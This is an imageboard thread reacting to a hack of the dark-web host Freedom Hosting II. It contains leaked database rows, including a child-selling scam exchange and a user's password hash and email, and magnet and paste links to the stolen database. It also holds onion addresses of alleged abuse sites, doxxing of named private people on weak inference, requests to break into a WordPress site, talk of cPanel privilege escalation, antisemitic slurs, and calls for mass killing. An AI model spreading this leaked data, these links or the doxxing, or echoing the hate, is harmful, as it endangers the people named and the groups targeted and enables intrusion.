(258,'redseven','Hello, \r\n\r\nI had sent you 1.01 BTC, my wallet says it was successfully sent/received, you must have it, could you please verify and credit my account accordingly?\r\nAbout how long does it take to process the BTC transfer?\r\nI understand the BTC price day to day but not by much, \r\nPlease, could you verify/credit my account ASAP, or refund the 1.01BTC and I\'ll re-send the ful bag amounts, ok?\r\n','2016-03-27',1,0)

(259,'redseven','Excuse me, I\'m a little confused, you just buying the bag 1, we can approve it without problems, but at the same time our superior told us that you are already doing business with him, which means that company policies you should deposit a bag 7. Please deposit the remainder for the bag 7 and continue dealing with him.','2016-03-27',1,1)

(260,'redseven','Hello support,\r\n\r\nAlright, I\'ve sent payment of Bag 7, please confirm and credit my account. \r\nSo, I\'ve now sent you a pre-payment of 1.01 BTC,($390USD) and now a payment of 4.265 BTC ($1820USD) for a total thus far of $2210USD.\r\nI\'m in contact with your superior via private email, his names Mathew, he needs this payment so we can proceed further with the adoption process.\r\nThank you.','2016-03-27',1,0)

(262,'redseven','Hi,\r\n\r\nCongratulations, you already have approved your bag 7. According to the information we have with this payment you going to be regarded as reliable and ideal client for us, so you can start adoption process. This bag is like a first payment of your purchase, which means to be deducted from the total due. I invite you to continue talking to our superior who take care of your particular case. It was a pleasure doing business with you.\r\n\r\nBest regards','2016-03-28',1,1)

(264,'redseven','Hello support, yes I\'m so happy to hear you\'ve approved my bag 7 payment, as it brings me one first step closer to adopting my child. \r\nI will have to make further payments either one or multiple, I will discuss with your superior.\r\nSo, I had sent a bag 1 payment previously, could you approve and add that to my total?\r\nI sincerely hope that from now one we can trust each other until this deal is final, I still wish to keep in touch with your superior and perhaps use your services again, I am very grateful for this! \r\nThanks again, ','2016-03-28',1,0)

(265,'redseven','Hi,\r\n\r\nToday I get a confidential document for you. You can access it at the following link: we.tl/iqTVU5bnW4\r\n\r\nPlease be careful with this documentation.\r\nRegards','2016-03-29',1,1),(266,'redseven','Hi support,\r\n\r\nOk, I downloaded the single page document successfully, I will inform your superior of my choice. \r\nI will pay the remaining balance soon as I can, waiting for my money to get moved to my BTC exchange. I will try to pay all $10000USD in BTC\'s in one transaction. \r\nI will keep this documentation safe, I understand the importance of confidentiality.\r\nBest Regards','2016-03-29',1,0),(267,'sysadmin','asd','2016-03-29',1,0)(268,'sysadmin','asd','2016-03-29',1,1)

(269,'redseven','Hi,\r\n\r\nExcuse me, today came new confidential documents for you. Please be careful, help us to maintain our anonymity.\r\n\r\nTo see please click here:\r\nwe.tl/lXvigmlpBe\r\n\r\nBest regards.','2016-03-30',1,1);

Take photos and lots of em and post them via gnunet we need to conserve the evidence if there is.

every fucking time

I won't complain a lot of pedos and scam are gone now.
I hope that their wasn't any legitimate use compromised.

There*

Exactly. My money is on this not even being a group, just some unrelated individual using them as a convenient false flag. Assuming the steps posted under are truthful, it was basically all over at step 3 when he identified and exploited that HUGE configuration mistake (lel @ using chroot for security in the current year), everything after that is methodical grunt work that a single person could do within a few hours.

Some anons were trying to take over "anonymous" for the right. Possibly them.

((((((((((((NSA LAUGHING))))))))))))

THIS!!!

Nobody likes child abusers, not even leftists. It could very well have been anolomoos.

Woah, Kek, easy with the shitposting my dude. You're like a God drunk on power right now.

Lol Kaleb is so fucked

Anonymous was hijacked by script kiddie lefties years ago, none of the original Holla Forumstards are there anymore.

Now I remember why I always hide this boards stickies without reading them.

>web.archive.org/web/20170206153058/http://www.volusiacountymoms.com/2011/05/arthaus-in-port-orange-offers-summer-art-camp.html

I've come to understand that the original user that embodied the "get shit done" and the "we do not forgive, we do not forget" credo has long since vanished off the radar. They went far far away for good reason. There was too much attention on them. They were becoming a political entity, which meant outside parties with agendas of their own were trying to weasel their way in… and sure enough, after the "real" Anonymous vanished, numerous new Anonymous organizations cropped up and started using the Anonymous imagery to puff up their otherwise impotent and aimless groups.

The Anonymous groups we hear about most often are ones who wave around their V masks like some kind of weapon, threatening big things against Trump and big banks and others, all while getting jack shit done. The user of old could track down a kitten smashing degenerate in a matter of hours. The user that makes the news these days are SJWs and regressive Marxists pretending to be the fearsome entity that once had the MSM shitting itself.

When someone claiming to be Anonymous cracks open a deepweb hive of pedophiles and child abusers, I'm prone to believe we're looking at the actions of classic user, and not the faux-user SJWs who bandy about the name in hopes of getting attention.

Video related, old comrade of mine whipped this up years ago before he quit due to 'anonymous' faggotry like Chanology, WWP, Occupy, etc.

so "your friend" quit after Chanology?
You know Chanology started the whole anonymoose faggotry?

They were just cyberbullying little girls into suicide, posting terrorist threats and doing Habbo raids amongst other things
Anonymous was really a force to be reckoned with before chanology and all moralfaggotry. True essence of lulz that Benji tried to revive (and somewhat succeeded) on baph.

Chanology barely did jack shit. I was growing up in motherfucking clearwater florida at the time. Chanology was a fucking failure.My middleschooler friends were more effective, shooting out windows with ball bearings as construction continued.

Scintology was not weakened, and scientology still owns all of downtown clearwater. Nothing was fucking accomplished but a leftystyle awareness circlejerk.

I bet their are interesting accounts of people who show up without kids but leave with them.

Don't worry, God is still on the job, punishing the wicked.

Original user didn't care about this moralfag shit tbh, sure there were some moralfags back then. But by far we didn't care about CP. CP was a joke mostly.

Who has got the DB or any fraction of it thereof?

I'll publish it ALL, free of charge, free downloads is what I do.

If you've got it, please upload it in my SECRET LEAKS FOLDER here:

mediafire.com/filedrop/filedrop_hosted.php?drop=d380d437b1a8dbf567cf6cda1056c825dc682d40c305a4b62d66e1183cf7e2d9

Stop.

"Conspiracy" is what the FBI and CIA are all about.

Let that Red Pill sink down into the depths of your being, and shake off that amazing, incredible psyop.

Not moralfaggotry per-se but pedobaiting and reporting them for the lols? Definitely.

There is a torrent file going around of the DB

>ghostbin.com/paste/twnzu
.47,'mrkinkyuk','The best mother and daughter\'s ages depending your taste, we can\'t advise you if we don\'t know your taste.\r\nOther styles: all philias, e.g. cropo, zoo, even necro, if you want.

Fucking KILL these people. There shouldn't even need to be a trial. Just fucking kill everyone involved with shit like this.
If I knew of anyone personally that did this kind of shit, I would end their lives with my hands around their throats.

Seems like the same story as with the baph bois

I remember some anons pedobaiting and extorting pedos for lulz.
Tbh that shit is dope

/i/nsurgents predated moralfags by years. Moralfags and maskfags gave user of old a face and they were politically motivated good goys for fags with a cause.

REEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE

A reminder to everyone that moot purged /i/ because he was scared. That might have been the first time people decide he was a faggot. Not a faggot in the "you're one of us" way, but more in the "you're giant humongous homosexual" way.
What Holla Forums did afterwards was never as good.
Got close sometimes but nothing will ever replace /i/.
Well, at least baphomet is keeping the spirit alive, I guess.

/i/nsurgents were underground (sort of). If you remember dangerous kitten and Firekipz (Tool kit and a browser hid inside .jpgs) The ruination for lulz happened without any fanfare, namefaggotry and faux status quo.

just imagine the sheer scale of suicides and accidents over night would be biblical, imagine - something like 5 - 10 million jews dying over night. liberal faces when

76 chan has an active (loosely used term) /i/ board.

fuck off jew crew shill.

HOW U DO DAT

AY YO HOL UP

HOW U DO DAT

Anonymous member here.

the guy selling the children types like a chinese

user…

spiegel.de/international/zeitgeist/the-sexual-revolution-and-children-how-the-left-took-things-too-far-a-702679.html

reminds me of schizophrenic drawings

If I touch this link, will I regret it?

Same question. Not trying to be stuck looking at CP and get fucked by the FBI just because I wanted to troll these fuckers

wew

get on vpn
get on teh oni0n relay
go to link

nice try comey

Your ragepost didn't help catch these fuckers.

Save that hatred. Focus it into something worthwhile to make a difference. Bait the evil and draw it out into the light where it shall burn.

Absolutely fucking disgusting.

purge the nation of pedos

Did Anonymous just admit they have CP?

I can't archive this page uk.linkedin.com/in/jayhamilton1 this guy lives and works in canada, had a Red7 production company and founded the RedSeven Charitable Foundation for youths. Also worked for S-Trip! (Student Trip), a "non-stop action day and night. The only way to celebrate the end of high school with all of your friends." Currently works for "I love Travel", the "leader in student youth and travel"

I also found this blog for a redseven who I assume is from Canada due to the content.

redseven.wordpress.com/alby/ Archived: archive.is/4lurR

The twitter account redseven.ca mobile.twitter.com/redsevencf (not archived) is for a kid's charitable foundation in Canada, called Red Seven, it is related to the blog because the Redseven link on the blog takes us to a website called redseven.ca that no longer exists.

The blog also has a password protected section! redseven. wordpress.com/jakob/

Possible lead? Can anyone hack wordpress sites?

I'm sure they made sure to scrape everything except for images, tbh.

wow nice find. deeper into the rabbit hole we go.

Am on pedo support forum right now support26v5pvkg6.onion/index.php?PHPSESSID=0jmj7l0v3g5mhhq929hvg8qfu7&topic=12302.msg143202#new

I have seen a list of affected sites posted:

Paradise Village

onion upload

LooK

El Paraiso Kiddo

Literature Forum

Tox Directory

Screenshot, cant post pics coz on tor postimg.org/image/lm7anfybn/964e4e52/

Jay Hamilton is currently working at "I Love Travel" and if you check the website you can see he is part of their executive team.

www.ilovetravel.com/staff

Also Jay Hamilton's fb if anyone wants to have a peek.

facebook.com/profile.php?id=58003705
archive.fo/oybpZ

pedonia.com/

FUCK IS THIS?

Seems that 2000s are back.

Isn't symlink easy to disable/prevent? Wouldn't some basic security knowledge have stopped them at step 3?

Yes.

Let's hope this leads to the arrest of actual child abusers, not just another excuse to moralfag about
Not that the sanctimonious cunts at anonymous know the difference.

Download torrents here:
pirate.london/inside-the-freedom-hosting-ii-leak-aae1104ab693#.y103azvgk

fhosting.sql.gz.torrent
magnet:?xt=urn:btih:a0a3bdb0fbb5c6763029d2553255f3fb7d69219a&dn=fhosting.sql.gz

fhosting.sql.gz.torrent
magnet:?xt=urn:btih:12c0d5839bf9321403c768461b8c6792d46bceab&dn=fhosting-system.tar.gz

Check out Randy Lennox too. Smells fishy, red 7 rock promotions in canada, children's charity and was down in Haiti as well…

en.m.wikipedia.org/wiki/Randy_Lennox

Shit, I just checked my server and I have this enabled.

Good thing I'm not doing anything stupid/illegal/shady.

web.archive.org/web/20111109033620/http://www.redseven.ca/blog/reintroducing-jay-hamilton/

web.archive.org/web/20111101052607/http://www.redseven.ca/learn/our-team-2/

web.archive.org/web/20111101000306/http://www.redseven.ca/gallery/

You get the picture.

I will not be clicking any of them links Catherine James. I don't even trust you for a start you filthy Mary.

When did they start dressing like Raelians?

paste.ee/p/pS3KG

may have identified one of the users who was discussing buying children in the Freedom Host 2 hack dump.

Alcon32 enquired about if there was an 'establishment' selling children in Hollywood, CA. I found an Alcon32 on reddit, he had posted two comments. One was "kik: ogturbo". I searched ogturbo and he's on instagram, looks like he's involved with Hollywood, travels alot and his latest pic was a shot of where he's working at Walker Stalkers Convention in Cali. ogturbo worked with 'hashtagnatalie' who is Natalie O'Brien on "The Bad Batch" in the Costume department, looking at the imdb page, Adrian MagaΓ±a is listed in the costume department, Natalie also mentions she will miss working with him in this post instagram.com/p/3fJAkkiKlN/ Archived: archive.is/2dVMf "

his tumblr page, NSFW link, also mentions his kik password ogturbo, along with questionable content. alcon32.tumblr.com Archived: archive.is/ViU9x

He goes by flacob16, alcon32 and ogturbo.

Nice work, user

There's another alcon32 elsewhere in the dump on a different forum.

alcon32','alcon32','$2y$10$aiCBN61H8RLe/OGgQR/60Oa2ZAta8fE2SjVM11PYplhErtYuW4vZy',1436879102,'[email protected]',

used namecheckr.com for "flacob16" and found a youtube account for "Adrian Magana". archive.is/1D9Ta

Googling "Adrian Magana flacob16" I found someone in Oxnard, CA. mylife.com/adrian-magana/flacob16 I'm getting an error trying to archive it. Here's a screen shot. imgur.com/gallery/wWUmN

I think this might be our man. Notice the relatives listed in this screenshot imgur.com/gallery/wWUmN Alma Magana..

Now back to the original Instagram picture… instagram.com/p/3fJAkkiKlN/

Alma Magana's name is listed on the binder on the table, and "missalmamagana" is also tagged in the picture, along with ogturbo (adrian).

Also as Username2017 pointed out, flacob16 links to this youtube channel youtube.com/user/flacob16

Look who hes subscribed to youtube.com/channel/UCtKPhqf5a98jMDBHvPYMPpA who uploaded a video called: "Young preteen girl dance booty 12yo"

yuh, probably hoping one of the minders is a total n00bcaek and will actually go for it in spite of the long-time runners being savvy enough to stay away.
Bad security like that is usually a sign of dyehair infiltration. Hey, wasn't anti-niGGers full of fucking paedos? Someone who's got that shit wherever it is, look for activity by Del Harvey, srhbutts, or Valis!

I think the twatter group is almost all 4Us so much SJ signaling and BLMing.

Kaleb is gon grow up to lead hisself a neo-nazi based African militia somewhere.

In addition to having sketchy charity involvement he's the one who made Bieber popular, I'm really hoping he's a pedo at this point.

Still digging for more, there's hardly anything on him besides the same handful of info on all of the sites.

This is a total goldmine of pedophile info, and this network must be investigated and prosecuted.

It is not about me, it is about the little children who must be protected from these wicked evildoers!!!

FREEDOM HOSTING DATABASE HACK DUMP.zip

I don't care who did this. They're doing God's work. I feel world's-tiniest-violin sorry for anyone who innocently hosted non-cp shit there, but fuck them really. The lesson here is stay the fuck away from these scum and you won't get hurt.

That's what the FBI is for, the White Hats who have the authority and manpower to shut this down, draining the swamp. But it is a big network out there that must be brought to justice. And the data base has tons and tons of leads which I'm sure leads up into the upper echelons of the Elite. they're all very guilty for doing this to the children for so long. And no, I'm not afraid of the Satanists or any other big bad wold group involved in this Network, they will be found out and dealt with!!!

There aren't any white hats, just cucks who have to pay their mortgages and do what they're told.

Justice is just us, now. When Sessions gets in, maybe things will change, but the Dems are fighting tooth and nail to stop him and Trump.

"Why I require FBI agents to visit the Holocaust Museum"
By James B. Comey April 16, 2015
washingtonpost.com/opinions/the-scariest-lesson-of-the-holocaust/2015/04/16/ffa8e23c-e468-11e4-905f-cc896d379a32_story.html

Don't worry though user, the FBI has no trouble going after those dangerous Right Wing Extremists who pose a dangerous threat to the country!
en.wikipedia.org/wiki/Waco_siege
en.wikipedia.org/wiki/Ruby_Ridge

Fuck the FBI, you kike pedo enabling pieces of shit.

It is a link aggregator for all kinds of services pedos share amongst themselves

Chatrooms, closed forums, open imageboards, image/video uploading sites, tutorials on how to coerce children, other link aggregators….

The main MAIN lair of all of their activity

You need to focus on child abusers, not pedophiles. Learn the difference.

So Holla Forums is right. Again. It's the kikes. And the cryptokikes

You guys understand that these are honey pots right? There are idiots who got caught because they thought you would be able to order girls like that. It's just like buying weed, you usually get contacts to dealers through friends not via lets say a facebook page or something like that. Everytime you're in a tor chat room you get these almost bot like guys going around "hey someone want to talk about meeting my little daughter?" This is the same just a more elaborate honeypot. Rich people who can do shit like this just do it via private contacts and people they know irl.

Harder, daddy.

(checked)
did you even read any of the information? this has human trafficking implications (although probably all just scams)

literally all that "anonymous" ever was, unless you count those IRC anonops namefags as being the "real movement"

There's two kinds of pedophiles. Pedophiles who need to be shot and. . .nah, there's just one kind.

You misspelled "child molestors."

Why so pedoshield? Is there something you should be telling us about yourself?

Traitors are shot first, you know that right?

top kek

Lol, it would only be an issue if you provided shared hosting.

Very possible his name is Jacob with that in mind.

>ghostbin.com/paste/twnzu
from the sound of it, they seem to be talking about human trafficking and actually buying humans, but they've discussed pricing and it's between $300-$450. I call bullshit. It would need to be at least several grand to make it worthwhile for human traffickers if legit.

eh, more proof Holla Forums is tumblr but right wing.

anyhow, if you check out topic links, most sites are still up. or maybe the pedos grew smarter and stopped using FH.

Wetransfer.com sounds like they transfer human cattle.

archive.is/MtcnR
archive.is/CMwdg

that was for hours to rent

lol, into the fucking ovens you go

what would happen if we raided them?

shoo shoo jew crew

This. I don't believe people are actually selling kids/renting out over the net. the big, Bohemian Grove type Jews like Epstein have flunkies to do their dirty work, they don't mess about on the net.
Tor (was) good for getting decent quality benzos if you have seizures and no shekels for insurance. Fuck sake, look at Podesta's grasp of basic technology which cost the Jews billions when he emailed out his own password. Fucking waste of time. also
Love to see all involved in the Gen Pop of a Max level 3.

voxday.blogspot.md/2015/09/anti-gamergate-is-pro-pedophile.html
theralphretort.com/anti-gamergate-accused-of-threatening-sjw-critical-of-nybergs-pedophilia-9020015/
rt.com/news/pedophile-communist-caught-red/
nytimes.com/2016/11/21/technology/fact-check-this-pizzeria-is-not-a-child-trafficking-site.html archive.is/4qzmk
crisismagazine.com/2016/harry-hay-pioneering-gay-communist-former-catholic

why would VIP pedos ever touch the DarkWeb?
most busted pedos are always plebs.

Law enforcement won't be interested - the hackers tainted all of it

And do the math here
Pay $20,000 for some girl and have no anonymity at all, and probably get blackmailed
Or chloroform some runaway from the homeless shelter nobody cares about
There's a lot of stupid in the world so maybe there's someone out there who would do the former
But in my opinion, Redseven sounds like a mountie

It could be another one of those situations where they ran it from the start. Step one being run the pedo sites. Step two.. run the pedo sites

That would be totally hilarious if Anonymous ruined an LEA op

If they are that powerful how come Virginia Roberts has not had an 'accidental overdose' or other form of untimely death yet?

In the UK 'darkjustice' have been warned by the police several times that they are fucking up ongoing undercover investigations…

yet they manage to get more people arrested and convicted than the cops. In fact the cops willfully turned a blind eye in many cases which pretty much shows that the cops are compromised in some way or other.

Main examples would be the many UK muslim pedophile rings and the forever continuing investigation into MP's systematically raping kids. I swear they are keeping the investigation going as long as possible because the victims are gradually dying off from old age.

I assume they would go on lockup mode and try to live throught the storm

First, he's back. The Age of Enlightment woke him up again.
Second, how do you hollow-redtext?

redseven(.)wordpress(.)com is squishy as fuck.

Theyre using waf to black list certain user agents. Hope this helps user.

http:// pastebin.com/dgSXGQwb

It would be extremely dehumanizing.

4U

They're collaborating. They are fully punishable by US law.

Lots of talk of honey pots here.

Remember, not every pedo out there has connections like epstein.

When running an illegal business, you always have the problem of communication, and advertising. Getting the word out. You have this antagonistic relationship between getting customers and maintaining infosec.

So no, not all these are fucking honeypots. Some are sure as shit gonna be legit.

To be honest "Anonymous" isn't (wasn't) supposed to be an organized group nor a brand but rather a disposable title that anyone could pick up and use to conceal their identity.

Anonymous is so faggy, I'm actually rooting for Freedom Hosting II!

Watching you normies try to talk about this is hilarious

you mean FBI

TRIPS CONFIRM

SIEG KAISER VLADIMIR

It's really a shame Russians inside Russia have no idea what Putin's doing, much less what he represents to us.

t. someone with Russian friends. I turned down a girl because miscegenation is a sin.

Yummers!

It's a shame indeed.

Enlighten me.
I'm serious.
The Russians I met were emigrants and their children who kept ties to Russia and only they, so they claimed, actually liked or even knew about Putin.

Holy shit, are any of these Freedom Hosting clones into Hardened Gentoo?!

Nice blogpost

Putin is not saviour of white race. He is state security officer who climbed on top and intends to stay there as long as he can. Which means:
1) protecting his fiefdom external threats, which is mainly globalism
That's what most people in first world see, where 'kaiser vladimir' comes from, and which is base of his external PR.
But that fight is fought in first place for good of local oligarchies, who do not want to give their power away to global ones. Good thing, is that it aligns with peoples' interests - being colony sucks, and it's only thing that globalism will give to Russia.
2) protecting his position
And that's where it gets shitty.
Political scene is dead, with parliament consisting of single ruling party (without any discernible position), couple of dusty clowns with seats ("systemic opposition") and assortment of petty coopted/discredited/retarded "unsystemic" opposition groups without ones. It's a cross between rubber stamp and random garbage generator, with next to zero feedback from population.
"Federation" is in name only, with all money going through Moscow.
Media that makes your MSM look like revolutionary pamphlets. Evil baby killing nazi Ukrainians, we are sworn enemies/friends/enemies/friends with Turkey, etc.
Very vague "extremism" and "hate speech" criminal articles. Almost anything can be fit there.
Any group of two or more people can be arrested as "unsanctioned demonstration"
Anything resembling nationalistic movements are stomped out instantly and brutally (being seen as most viable internal threat).
Internet censorship (thankfully retarded and dysfunctional for now, but mostly because there where no reason to actually use it for it's intended purpose)
Gun laws (no handguns, no magazines above 10 rounds) and shitty self-defence laws (but that goes more into next category)
3) not wasting effort on stuff that does not pose risk to you
Very large gap between rich and poor regions.
Cities swarming with abbo-tier alcoholic degenerates.
Federal subject ruled by warlord, with clans raiding neighbours for slaves? Fine as long as he remembers who feeds him and does not deflect to foreign islamic groups.
Africa-tier AIDS epidemic, ready to spill out of it's natural reservoir of intravenous junkies into general population.
Retarded laws produced by zombified duma, like "protection of believers' feelings" (yes, it's "feelings". Not rights, not even blasphemy. Feelings)

But to be fair, Putin is best of possible shitty scenarios (and all possible scenarios for Russia since ~1960s are shitty). At least he is competent and plays long game (rather than loot as much as he can and run away)

I genuinely think he's as patriotic as a person in power can get and as pro-White and anti-jew a person off power in Russia can get.

Just a reminder, we have zero proof of "Anonymous" claims.

enjoy your dying birthrates. nothing will fix them.

If you're shocked that the darknet is like 90% scams and illegal porn than I doubt you've ever even been there tbh.

Does Annymouse do anything non-pozzed anymore?

They found some pedo in the leaked info…

voat.co/v/pizzagate/1623435

The brand was hijacked by US government agencies.

I realised this some years back when "Anonymous" 'hacktivism' was being retweeted and shared by US and UN state actors after minor leaks in corrupt African and Arab shitholes. The "official" site and social media is all a clever ruse. Anonymous's Youtube "hacked" some flattering Bill Clinton video before the election and Google promoted it.

If they're allowing CP and running scam sites, then good.

And hopefully this will lead to those that are uploading & downloading that CP…maybe some of them will be the high-level pervs in Hollywood & international politics.
I can dream, can't I?

It's even worse.
I never go there, for any reason. It turns my stomach.

Says the ferret-faced little hook-nose whose heavily miscegenated "race" is less than 2% of the U.S. population…

that is interesting, thank you

opion 1:

shitdaddy uses centos or cloudlinux and usually cpanel 11.58 based on my current hosting accounts thats an old version of cpanel so it my contain some exploitable escallation shit you get root on one box u might get to login to others

i looked into comet pizza's info before and it looked like they were hosted on an aws based host in ireland that's about all i found

guantanamo bay needs to be filled with these subhuman savages.

kill them all

from the ghostbin

can anyone find who this phone# belong(ed) to?

Name and adress behind a paywall

It looks like it's registered to a wireless service called "Spok," the name is registered to USA Mobility, but nearly every one of their pages redirects to Spok based in Yuma, Arizona. It seems like the guy is using something like a paging service or a ported landline to make it harder to find him. This also might be worth considering: Spok specializes in securing communications for hospitals and healthcare entities.

I'd include an archive link, but SpyDialer is being uncooperative.

No doubt a service like Spok will cover their ass with at least some kind of information that could lead us to pauluk

Any attorney anons that could "pressure" Spok makers into givong such info?

Jeff Sessions is officially AG. Let the arrests of the pederasts begin…

sage

fuck off BO

what the fuck man

Kill yourself pedo scum.

good, gas them both

FREEDOM HOSTING DATABASE HACK DUMP.zip

Even leftists don't like them? Bullshit they are the ones trying to get shit like Pedosexual to be a fucking thing.

Why not both faggot? Hang both groups problem solved.

Was Alphabay compromised?

Why do you faggots obsess over pedos? Yes they're awful but the obsession reminds me of anti-gay types who are closet fags.

Support law enforcement against them but the obsession is creepy and weird.

Just shoot them, they might enjoy that…

you're not anonymous.
why, you're not anonymous at all.

Start with Trump lol
I can guarantee you that and other feminist issues are the LAST priority of his administration

Interesting Beibers mother was aware that a group on Youtube involved with her son were pedos

encyclopediadramatica.se/Ytask#How_The_Truth_Was_Uncovered

encyclopediadramatica.se/Kidrauhl#Pattie_Mallette_supported_Ytask

When did Anonymous become so anti-degenerate.?

lol some of my old messages

This. In fact the whole torture thing would almost be like when saints were tortured in ancient times. It just validates them. Better to disappear them like the communists did, don't give them a chance to make their death meaningful, to show any kind of courage or say some last words, just efficiently destroy them and have them forgotten. That is very wounding to the human ago. To be a statistic in a pile of millions of dead bodies nobody gives a shit about.>>9219634

Impalement worked wonders against mudslimes.

KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB! KALEB!

rekt

Bullshit.

All the pedo sites are still up.

oxwugzccvk3dk6tj.onion/

They took down russian scam sites and legitimate sites. 99% of Tor sites are not CP. Anonymous are full of shit.

why are all tor posters retarded?

Why? He's not getting v& for posting that link any more then he gets v& for having it.
And you honestly thinK LEA doesn't know those sites?

Elites have thier own networks, this is just your average greasy pervert on these things.

SIGAINT is dead
DEAD

and oldschool. This is totally the feds. The payment to get your data back from each respective compromised sauce is way too low for a ransom. Total honey-potting. Awwww ye, looks like the feds aren't 100% kiked out yet after all.

The CIA are hiding them, not exposing them. Our agencies seem to literally be within a state of cold war with each other!

who are the proxy soldiers of this cold war..